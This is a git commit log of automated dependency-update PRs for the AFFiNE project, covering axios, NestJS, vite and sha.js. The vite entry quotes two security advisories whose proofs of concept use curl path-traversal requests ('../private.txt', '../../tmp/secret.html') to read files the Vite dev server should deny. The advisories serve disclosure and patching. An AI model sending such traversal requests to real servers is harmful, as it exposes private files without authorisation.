href="https://redirect.github.com/axios/axios/issues/6998">#6998</a>) (<a href="https://github.com/axios/axios/commit/a9f47afbf3224d2ca987dbd8188789c7ea853c5d">a9f47af</a>)</li> <li><strong>node:</strong> enforce maxContentLength for data: URLs (<a href="https://redirect.github.com/axios/axios/issues/7011">#7011</a>) (<a href="https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593">945435f</a>)</li> <li>package exports (<a href="https://redirect.github.com/axios/axios/issues/5627">#5627</a>) (<a href="https://github.com/axios/axios/commit/aa78ac23fc9036163308c0f6bd2bb885e7af3f36">aa78ac2</a>)</li> <li><strong>params:</strong> removing '[' and ']' from URL encode exclude characters (<a href="https://redirect.github.com/axios/axios/issues/3316">#3316</a>) (<a href="https://redirect.github.com/axios/axios/issues/5715">#5715</a>) (<a href="https://github.com/axios/axios/commit/6d84189349c43b1dcdd977b522610660cc4c7042">6d84189</a>)</li> <li>release pr run (<a href="https://github.com/axios/axios/commit/fd7f404488b2c4f238c2fbe635b58026a634bfd2">fd7f404</a>)</li> <li><strong>types:</strong> change the type guard on isCancel (<a href="https://redirect.github.com/axios/axios/issues/5595">#5595</a>) (<a href="https://github.com/axios/axios/commit/0dbb7fd4f61dc568498cd13a681fa7f907d6ec7e">0dbb7fd</a>)</li> </ul> <h3>Features</h3> <ul> <li><strong>adapter:</strong> surface low‑level network error details; attach original error via cause (<a href="https://redirect.github.com/axios/axios/issues/6982">#6982</a>) (<a href="https://github.com/axios/axios/commit/78b290c57c978ed2ab420b90d97350231c9e5d74">78b290c</a>)</li> <li><strong>fetch:</strong> add fetch, Request, Response env config variables for the adapter; (<a href="https://redirect.github.com/axios/axios/issues/7003">#7003</a>) (<a href="https://github.com/axios/axios/commit/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b">c959ff2</a>)</li> <li>support reviver on JSON.parse (<a href="https://redirect.github.com/axios/axios/issues/5926">#5926</a>) (<a href="https://github.com/axios/axios/commit/2a9763426e43d996fd60d01afe63fa6e1f5b4fca">2a97634</a>), closes <a href="https://redirect.github.com/axios/axios/issues/5924">#5924</a></li> <li><strong>types:</strong> extend AxiosResponse interface to include custom headers type (<a href="https://redirect.github.com/axios/axios/issues/6782">#6782</a>) (<a href="https://github.com/axios/axios/commit/7960d34eded2de66ffd30b4687f8da0e46c4903e">7960d34</a>)</li> </ul> <h3>Contributors to this release</h3> <ul> <li><!-- raw HTML omitted --> <a href="https://github.com/WillianAgostini" title="+132/-16760 ([#7002](https://github.com/axios/axios/issues/7002) [#5926](https://github.com/axios/axios/issues/5926) [#6782](https://github.com/axios/axios/issues/6782) )">Willian Agostini</a></li> <li><!-- raw HTML omitted --> <a href="https://github.com/DigitalBrainJS" title="+4263/-293 ([#7006](https://github.com/axios/axios/issues/7006) [#7003](https://github.com/axios/axios/issues/7003) )">Dmitriy Mozgovoy</a></li> <li><!-- raw HTML omitted --> <a href="https://github.com/mkhani01" title="+111/-15 ([#6982](https://github.com/axios/axios/issues/6982) )">khani</a></li> <li><!-- raw HTML omitted --> <a href="https://github.com/AmeerAssadi" title="+123/-0 ([#7011](https://github.com/axios/axios/issues/7011) )">Ameer Assadi</a></li> <li><!-- raw HTML omitted --> <a href="https://github.com/emiedonmokumo" title="+55/-35 ([#6998](https://github.com/axios/axios/issues/6998) )">Emiedonmokumo Dick-Boro</a></li> <li><!-- raw HTML omitted --> <a href="https://github.com/opsysdebug" title="+8/-8 ([#6980](https://github.com/axios/axios/issues/6980) )">Zeroday BYTE</a></li> </ul> <!-- raw HTML omitted --> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Changelog</summary> <p><em>Sourced from <a href="https://github.com/axios/axios/blob/v1.x/CHANGELOG.md">axios's changelog</a>.</em></p> <blockquote> <h2><a href="https://github.com/axios/axios/compare/v1.12.1...v1.12.2">1.12.2</a> (2025-09-14)</h2> <h3>Bug Fixes</h3> <ul> <li><strong>fetch:</strong> use current global fetch instead of cached one when env fetch is not specified to keep MSW support; (<a href="https://redirect.github.com/axios/axios/issues/7030">#7030</a>) (<a href="https://github.com/axios/axios/commit/cf78825e1229b60d1629ad0bbc8a752ff43c3f53">cf78825</a>)</li> </ul> <h3>Contributors to this release</h3> <ul> <li><!-- raw HTML omitted --> <a href="https://github.com/DigitalBrainJS" title="+247/-16 ([#7030](https://github.com/axios/axios/issues/7030) [#7022](https://github.com/axios/axios/issues/7022) [#7024](https://github.com/axios/axios/issues/7024) )">Dmitriy Mozgovoy</a></li> <li><!-- raw HTML omitted --> <a href="https://github.com/noritaka1166" title="+2/-6 ([#7028](https://github.com/axios/axios/issues/7028) [#7029](https://github.com/axios/axios/issues/7029) )">Noritaka Kobayashi</a></li> </ul> <h2><a href="https://github.com/axios/axios/compare/v1.12.0...v1.12.1">1.12.1</a> (2025-09-12)</h2> <h3>Bug Fixes</h3> <ul> <li><strong>types:</strong> fixed env config types; (<a href="https://redirect.github.com/axios/axios/issues/7020">#7020</a>) (<a href="https://github.com/axios/axios/commit/b5f26b75bdd9afa95016fb67d0cab15fc74cbf05">b5f26b7</a>)</li> </ul> <h3>Contributors to this release</h3> <ul> <li><!-- raw HTML omitted --> <a href="https://github.com/DigitalBrainJS" title="+10/-4 ([#7020](https://github.com/axios/axios/issues/7020) )">Dmitriy Mozgovoy</a></li> </ul> <h1><a href="https://github.com/axios/axios/compare/v1.11.0...v1.12.0">1.12.0</a> (2025-09-11)</h1> <h3>Bug Fixes</h3> <ul> <li>adding build artifacts (<a href="https://github.com/axios/axios/commit/9ec86de257bfa33856571036279169f385ed92bd">9ec86de</a>)</li> <li>dont add dist on release (<a href="https://github.com/axios/axios/commit/a2edc3606a4f775d868a67bb3461ff18ce7ecd11">a2edc36</a>)</li> <li><strong>fetch-adapter:</strong> set correct Content-Type for Node FormData (<a href="https://redirect.github.com/axios/axios/issues/6998">#6998</a>) (<a href="https://github.com/axios/axios/commit/a9f47afbf3224d2ca987dbd8188789c7ea853c5d">a9f47af</a>)</li> <li><strong>node:</strong> enforce maxContentLength for data: URLs (<a href="https://redirect.github.com/axios/axios/issues/7011">#7011</a>) (<a href="https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593">945435f</a>)</li> <li>package exports (<a href="https://redirect.github.com/axios/axios/issues/5627">#5627</a>) (<a href="https://github.com/axios/axios/commit/aa78ac23fc9036163308c0f6bd2bb885e7af3f36">aa78ac2</a>)</li> <li><strong>params:</strong> removing '[' and ']' from URL encode exclude characters (<a href="https://redirect.github.com/axios/axios/issues/3316">#3316</a>) (<a href="https://redirect.github.com/axios/axios/issues/5715">#5715</a>) (<a href="https://github.com/axios/axios/commit/6d84189349c43b1dcdd977b522610660cc4c7042">6d84189</a>)</li> <li>release pr run (<a href="https://github.com/axios/axios/commit/fd7f404488b2c4f238c2fbe635b58026a634bfd2">fd7f404</a>)</li> <li><strong>types:</strong> change the type guard on isCancel (<a href="https://redirect.github.com/axios/axios/issues/5595">#5595</a>) (<a href="https://github.com/axios/axios/commit/0dbb7fd4f61dc568498cd13a681fa7f907d6ec7e">0dbb7fd</a>)</li> </ul> <h3>Features</h3> <ul> <li><strong>adapter:</strong> surface low‑level network error details; attach original error via cause (<a href="https://redirect.github.com/axios/axios/issues/6982">#6982</a>) (<a href="https://github.com/axios/axios/commit/78b290c57c978ed2ab420b90d97350231c9e5d74">78b290c</a>)</li> <li><strong>fetch:</strong> add fetch, Request, Response env config variables for the adapter; (<a href="https://redirect.github.com/axios/axios/issues/7003">#7003</a>) (<a href="https://github.com/axios/axios/commit/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b">c959ff2</a>)</li> <li>support reviver on JSON.parse (<a href="https://redirect.github.com/axios/axios/issues/5926">#5926</a>) (<a href="https://github.com/axios/axios/commit/2a9763426e43d996fd60d01afe63fa6e1f5b4fca">2a97634</a>), closes <a href="https://redirect.github.com/axios/axios/issues/5924">#5924</a></li> <li><strong>types:</strong> extend AxiosResponse interface to include custom headers type (<a href="https://redirect.github.com/axios/axios/issues/6782">#6782</a>) (<a href="https://github.com/axios/axios/commit/7960d34eded2de66ffd30b4687f8da0e46c4903e">7960d34</a>)</li> </ul> <h3>Contributors to this release</h3> <ul> <li><!-- raw HTML omitted --> <a href="https://github.com/WillianAgostini" title="+132/-16760 ([#7002](https://github.com/axios/axios/issues/7002) [#5926](https://github.com/axios/axios/issues/5926) [#6782](https://github.com/axios/axios/issues/6782) )">Willian Agostini</a></li> <li><!-- raw HTML omitted --> <a href="https://github.com/DigitalBrainJS" title="+4263/-293 ([#7006](https://github.com/axios/axios/issues/7006) [#7003](https://github.com/axios/axios/issues/7003) )">Dmitriy Mozgovoy</a></li> <li><!-- raw HTML omitted --> <a href="https://github.com/mkhani01" title="+111/-15 ([#6982](https://github.com/axios/axios/issues/6982) )">khani</a></li> </ul> <!-- raw HTML omitted --> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Commits</summary> <ul> <li><a href="https://github.com/axios/axios/commit/e5a33366d75b65f88052b230b103731eb7dcb793"><code>e5a3336</code></a> chore(release): v1.12.2 (<a href="https://redirect.github.com/axios/axios/issues/7031">#7031</a>)</li> <li><a href="https://github.com/axios/axios/commit/38726c7586c6a2583b7e7dcdce0c4fedd013055d"><code>38726c7</code></a> refactor: change if in else to else if (<a href="https://redirect.github.com/axios/axios/issues/7028">#7028</a>)</li> <li><a href="https://github.com/axios/axios/commit/cf78825e1229b60d1629ad0bbc8a752ff43c3f53"><code>cf78825</code></a> fix(fetch): use current global fetch instead of cached one when env fetch is ...</li> <li><a href="https://github.com/axios/axios/commit/c26d00f451949306f708aa78d1e9f12b9eb6ff4b"><code>c26d00f</code></a> refactor: remove redundant assignment (<a href="https://redirect.github.com/axios/axios/issues/7029">#7029</a>)</li> <li><a href="https://github.com/axios/axios/commit/9fb41a8fcd6f698ee82175c0d9e654b4b0a7081c"><code>9fb41a8</code></a> chore(ci): add local HTTP server for Karma tests; (<a href="https://redirect.github.com/axios/axios/issues/7022">#7022</a>)</li> <li><a href="https://github.com/axios/axios/commit/19f9f36850210511445c67c865466156d6d1dee2"><code>19f9f36</code></a> docs(readme): add custom fetch section; (<a href="https://redirect.github.com/axios/axios/issues/7024">#7024</a>)</li> <li><a href="https://github.com/axios/axios/commit/3cac78c2de2d1d1af0c1b4753feff16c075f01d1"><code>3cac78c</code></a> chore(release): v1.12.1 (<a href="https://redirect.github.com/axios/axios/issues/7021">#7021</a>)</li> <li><a href="https://github.com/axios/axios/commit/b5f26b75bdd9afa95016fb67d0cab15fc74cbf05"><code>b5f26b7</code></a> fix(types): fixed env config types; (<a href="https://redirect.github.com/axios/axios/issues/7020">#7020</a>)</li> <li><a href="https://github.com/axios/axios/commit/0d8ad6e1de0f5339e02bc262d6f0df4936974120"><code>0d8ad6e</code></a> chore(release): v1.12.0 (<a href="https://redirect.github.com/axios/axios/issues/7013">#7013</a>)</li> <li><a href="https://github.com/axios/axios/commit/fd7f404488b2c4f238c2fbe635b58026a634bfd2"><code>fd7f404</code></a> fix: release pr run</li> <li>Additional commits viewable in <a href="https://github.com/axios/axios/compare/v1.9.0...v1.12.2">compare view</a></li> </ul> </details> <br /> [](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores) Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`. [//]: # (dependabot-automerge-start) [//]: # (dependabot-automerge-end) --- <details> <summary>Dependabot commands and options</summary> <br /> You can trigger Dependabot actions by commenting on this PR: - `@dependabot rebase` will rebase this PR - `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it - `@dependabot merge` will merge this PR after your CI passes on it - `@dependabot squash and merge` will squash and merge this PR after your CI passes on it - `@dependabot cancel merge` will cancel a previously requested merge and block automerging - `@dependabot reopen` will reopen this PR if it is closed - `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually - `@dependabot show <dependency name> ignore conditions` will show all of the ignore conditions of the specified dependency - `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself) - `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself) - `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) You can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/toeverything/AFFiNE/network/alerts). </details> Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> |
||
|
|
d231b47f1f |
chore: bump up nestjs (#13614)
Coming soon: The Renovate bot (GitHub App) will be renamed to Mend. PRs from Renovate will soon appear from 'Mend'. Learn more [here](https://redirect.github.com/renovatebot/renovate/discussions/37842). This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [@nestjs/bullmq](https://redirect.github.com/nestjs/bull) | [`11.0.2` -> `11.0.3`](https://renovatebot.com/diffs/npm/@nestjs%2fbullmq/11.0.2/11.0.3) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@nestjs/common](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common)) | [`11.1.5` -> `11.1.6`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.5/11.1.6) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@nestjs/core](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core)) | [`11.1.5` -> `11.1.6`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.5/11.1.6) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@nestjs/platform-express](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express)) | [`11.1.5` -> `11.1.6`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.5/11.1.6) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@nestjs/platform-socket.io](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io)) | [`11.1.5` -> `11.1.6`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.5/11.1.6) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@nestjs/schedule](https://redirect.github.com/nestjs/schedule) | [`6.0.0` -> `6.0.1`](https://renovatebot.com/diffs/npm/@nestjs%2fschedule/6.0.0/6.0.1) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@nestjs/websockets](https://redirect.github.com/nestjs/nest) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets)) | [`11.1.5` -> `11.1.6`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.5/11.1.6) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>nestjs/bull (@​nestjs/bullmq)</summary> ### [`v11.0.3`](https://redirect.github.com/nestjs/bull/releases/tag/%40nestjs/bullmq%4011.0.3) [Compare Source](https://redirect.github.com/nestjs/bull/compare/@nestjs/bullmq@11.0.2...@nestjs/bullmq@11.0.3) #### What's Changed - feat(bullmq): add telemetry support for workers by [@​noeljackson](https://redirect.github.com/noeljackson) in [#​2585](https://redirect.github.com/nestjs/bull/pull/2585) #### New Contributors - [@​noeljackson](https://redirect.github.com/noeljackson) made their first contribution in [#​2585](https://redirect.github.com/nestjs/bull/pull/2585) **Full Changelog**: <https://github.com/nestjs/bull/compare/@nestjs/bull-shared@11.0.0...@​nestjs/bullmq@11.0.3> </details> <details> <summary>nestjs/nest (@​nestjs/common)</summary> ### [`v11.1.6`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.6) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.5...v11.1.6) ##### v11.1.6 (2025-08-07) ##### Bug fixes - `core` - [#​15504](https://redirect.github.com/nestjs/nest/pull/15504) fix(core): fix race condition in class dependency resolution from imported modules ([@​hajekjiri](https://redirect.github.com/hajekjiri)) - [#​15469](https://redirect.github.com/nestjs/nest/pull/15469) fix(core): attach root inquirer for nested transient providers ([@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec)) - `microservices` - [#​15508](https://redirect.github.com/nestjs/nest/pull/15508) fix(microservices): report correct buffer length in exception ([@​kim-sung-jee](https://redirect.github.com/kim-sung-jee)) - [#​15492](https://redirect.github.com/nestjs/nest/pull/15492) fix(microservices): fix kafka serilization of class instances ([@​LeonBiersch](https://redirect.github.com/LeonBiersch)) ##### Dependencies - `platform-fastify` - [#​15493](https://redirect.github.com/nestjs/nest/pull/15493) chore(deps): bump [@​fastify/cors](https://redirect.github.com/fastify/cors) from 11.0.1 to 11.1.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot)) ##### Committers: 6 - Jiri Hajek ([@​hajekjiri](https://redirect.github.com/hajekjiri)) - Kamil Mysliwiec ([@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec)) - Leon Biersch ([@​LeonBiersch](https://redirect.github.com/LeonBiersch)) - Seongjee Kim ([@​kim-sung-jee](https://redirect.github.com/kim-sung-jee)) - [@​premierbell](https://redirect.github.com/premierbell) - pTr ([@​ptrgits](https://redirect.github.com/ptrgits)) </details> <details> <summary>nestjs/schedule (@​nestjs/schedule)</summary> ### [`v6.0.1`](https://redirect.github.com/nestjs/schedule/releases/tag/6.0.1) [Compare Source](https://redirect.github.com/nestjs/schedule/compare/6.0.0...6.0.1) #### What's Changed - Add threshold to CronOptions by [@​arjunatlightspeed](https://redirect.github.com/arjunatlightspeed) in [#​2085](https://redirect.github.com/nestjs/schedule/pull/2085) - refactor : clear jobs before application shutdown by [@​spotlight21c](https://redirect.github.com/spotlight21c) in [#​2053](https://redirect.github.com/nestjs/schedule/pull/2053) - fix(deps): update dependency cron to v4.3.3 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​2001](https://redirect.github.com/nestjs/schedule/pull/2001) #### New Contributors - [@​arjunatlightspeed](https://redirect.github.com/arjunatlightspeed) made their first contribution in [#​2085](https://redirect.github.com/nestjs/schedule/pull/2085) - [@​spotlight21c](https://redirect.github.com/spotlight21c) made their first contribution in [#​2053](https://redirect.github.com/nestjs/schedule/pull/2053) **Full Changelog**: <https://github.com/nestjs/schedule/compare/6.0.0...6.0.1> </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS45Ny4xMCIsInVwZGF0ZWRJblZlciI6IjQxLjk3LjEwIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
fd717af3db |
fix(core): update and fix oxlint error (#13591)
#### PR Dependency Tree * **PR #13591** 👈 * **PR #13590** This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit - Bug Fixes - Improved drag-and-drop stability: draggables, drop targets, and monitors now respond when option sources or external data change. - Improved async actions and permission checks to always use the latest callbacks and error handlers. - Chores - Lint/Prettier configs updated to ignore the Git directory. - Upgraded oxlint dev dependency. - Tests - Updated several end-to-end tests for more reliable text selection, focus handling, and timing. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
039976ee6d |
chore: bump up vite version to v6.3.6 [SECURITY] (#13573)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [vite](https://vite.dev) ([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite)) | [`6.3.5` -> `6.3.6`](https://renovatebot.com/diffs/npm/vite/6.3.5/6.3.6) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2025-58751](https://redirect.github.com/vitejs/vite/security/advisories/GHSA-g4jq-h2w9-997c) ### Summary Files starting with the same name with the public directory were served bypassing the `server.fs` settings. ### Impact Only apps that match the following conditions are affected: - explicitly exposes the Vite dev server to the network (using --host or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) - uses [the public directory feature](https://vite.dev/guide/assets.html#the-public-directory) (enabled by default) - a symlink exists in the public directory ### Details The [servePublicMiddleware](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L79) function is in charge of serving public files from the server. It returns the [viteServePublicMiddleware](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L106) function which runs the needed tests and serves the page. The viteServePublicMiddleware function [checks if the publicFiles variable is defined](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L111), and then uses it to determine if the requested page is public. In the case that the publicFiles is undefined, the code will treat the requested page as a public page, and go on with the serving function. [publicFiles may be undefined if there is a symbolic link anywhere inside the public directory](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/publicDir.ts#L21). In that case, every requested page will be passed to the public serving function. The serving function is based on the [sirv](https://redirect.github.com/lukeed/sirv) library. Vite patches the library to add the possibility to test loading access to pages, but when the public page middleware [disables this functionality](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L89) since public pages are meant to be available always, regardless of whether they are in the allow or deny list. In the case of public pages, the serving function is [provided with the path to the public directory](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L85) as a root directory. The code of the sirv library [uses the join function to get the full path to the requested file](https://redirect.github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L42). For example, if the public directory is "/www/public", and the requested file is "myfile", the code will join them to the string "/www/public/myfile". The code will then pass this string to the normalize function. Afterwards, the code will [use the string's startsWith function](https://redirect.github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L43) to determine whether the created path is within the given directory or not. Only if it is, it will be served. Since [sirv trims the trailing slash of the public directory](https://redirect.github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L119), the string's startsWith function may return true even if the created path is not within the public directory. For example, if the server's root is at "/www", and the public directory is at "/www/p", if the created path will be "/www/private.txt", the startsWith function will still return true, because the string "/www/private.txt" starts with "/www/p". To achieve this, the attacker will use ".." to ask for the file "../private.txt". The code will then join it to the "/www/p" string, and will receive "/www/p/../private.txt". Then, the normalize function will return "/www/private.txt", which will then be passed to the startsWith function, which will return true, and the processing of the page will continue without checking the deny list (since this is the public directory middleware which doesn't check that). ### PoC Execute the following shell commands: ``` npm create vite@latest cd vite-project/ mkdir p cd p ln -s a b cd .. echo 'import path from "node:path"; import { defineConfig } from "vite"; export default defineConfig({publicDir: path.resolve(__dirname, "p/"), server: {fs: {deny: [path.resolve(__dirname, "private.txt")]}}})' > vite.config.js echo "secret" > private.txt npm install npm run dev ``` Then, in a different shell, run the following command: `curl -v --path-as-is 'http://localhost:5173/private.txt'` You will receive a 403 HTTP Response, because private.txt is denied. Now in the same shell run the following command: `curl -v --path-as-is 'http://localhost:5173/../private.txt'` You will receive the contents of private.txt. ### Related links - https://github.com/lukeed/sirv/commit/f0113f3f8266328d804ee808f763a3c11f8997eb #### [CVE-2025-58752](https://redirect.github.com/vitejs/vite/security/advisories/GHSA-jqfw-vq24-v9c3) ### Summary Any HTML files on the machine were served regardless of the `server.fs` settings. ### Impact Only apps that match the following conditions are affected: - explicitly exposes the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host)) - `appType: 'spa'` (default) or `appType: 'mpa'` is used This vulnerability also affects the preview server. The preview server allowed HTML files not under the output directory to be served. ### Details The [serveStaticMiddleware](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L123) function is in charge of serving static files from the server. It returns the [viteServeStaticMiddleware](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L136) function which runs the needed tests and serves the page. The viteServeStaticMiddleware function [checks if the extension of the requested file is ".html"](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L144). If so, it doesn't serve the page. Instead, the server will go on to the next middlewares, in this case [htmlFallbackMiddleware](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/htmlFallback.ts#L14), and then to [indexHtmlMiddleware](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/indexHtml.ts#L438). These middlewares don't perform any test against allow or deny rules, and they don't make sure that the accessed file is in the root directory of the server. They just find the file and send back its contents to the client. ### PoC Execute the following shell commands: ``` npm create vite@latest cd vite-project/ echo "secret" > /tmp/secret.html npm install npm run dev ``` Then, in a different shell, run the following command: `curl -v --path-as-is 'http://localhost:5173/../../../../../../../../../../../tmp/secret.html'` The contents of /tmp/secret.html will be returned. This will also work for HTML files that are in the root directory of the project, but are in the deny list (or not in the allow list). Test that by stopping the running server (CTRL+C), and running the following commands in the server's shell: ``` echo 'import path from "node:path"; import { defineConfig } from "vite"; export default defineConfig({server: {fs: {deny: [path.resolve(__dirname, "secret_files/*")]}}})' > [vite.config.js](http://vite.config.js) mkdir secret_files echo "secret txt" > secret_files/secret.txt echo "secret html" > secret_files/secret.html npm run dev ``` Then, in a different shell, run the following command: `curl -v --path-as-is 'http://localhost:5173/secret_files/secret.txt'` You will receive a 403 HTTP Response, because everything in the secret_files directory is denied. Now in the same shell run the following command: `curl -v --path-as-is 'http://localhost:5173/secret_files/secret.html'` You will receive the contents of secret_files/secret.html. --- ### Release Notes <details> <summary>vitejs/vite (vite)</summary> ### [`v6.3.6`](https://redirect.github.com/vitejs/vite/releases/tag/v6.3.6) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v6.3.5...v6.3.6) Please refer to [CHANGELOG.md](https://redirect.github.com/vitejs/vite/blob/v6.3.6/packages/vite/CHANGELOG.md) for details. </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about these updates again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS45Ny4xMCIsInVwZGF0ZWRJblZlciI6IjQxLjk3LjEwIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
e158e11608 |
chore: bump sha.js from 2.4.11 to 2.4.12 (#13560)
Bumps [sha.js](https://github.com/crypto-browserify/sha.js) from 2.4.11 to 2.4.12. <details> <summary>Changelog</summary> <p><em>Sourced from <a href="https://github.com/browserify/sha.js/blob/master/CHANGELOG.md">sha.js's changelog</a>.</em></p> <blockquote> <h2><a href="https://github.com/browserify/sha.js/compare/v2.4.11...v2.4.12">v2.4.12</a> - 2025-07-01</h2> <h3>Commits</h3> <ul> <li>[eslint] switch to eslint <a href="https://github.com/browserify/sha.js/commit/7acadfbd3abb558880212b20669fcb09e1aa1c58"><code>7acadfb</code></a></li> <li>[meta] add <code>auto-changelog</code> <a href="https://github.com/browserify/sha.js/commit/b46e7116ebeaa82f34bbf2d7494fff7ef46eab3e"><code>b46e711</code></a></li> <li>[eslint] fix package.json indentation <a href="https://github.com/browserify/sha.js/commit/df9d521e16ddf55dc877c43c05706d43c057fad4"><code>df9d521</code></a></li> <li>[Tests] migrate from travis to GHA <a href="https://github.com/browserify/sha.js/commit/c43c64adc6d3607d470538df72338fc02e63bc24"><code>c43c64a</code></a></li> <li>[Fix] support multi-byte wide typed arrays <a href="https://github.com/browserify/sha.js/commit/f2a258e9f2d0fcd113bfbaa49706e1ac0d979ba5"><code>f2a258e</code></a></li> <li>[meta] reorder package.json <a href="https://github.com/browserify/sha.js/commit/d8d77c0a729c99593e304047f9d4335b498fd9ed"><code>d8d77c0</code></a></li> <li>[meta] add <code>npmignore</code> <a 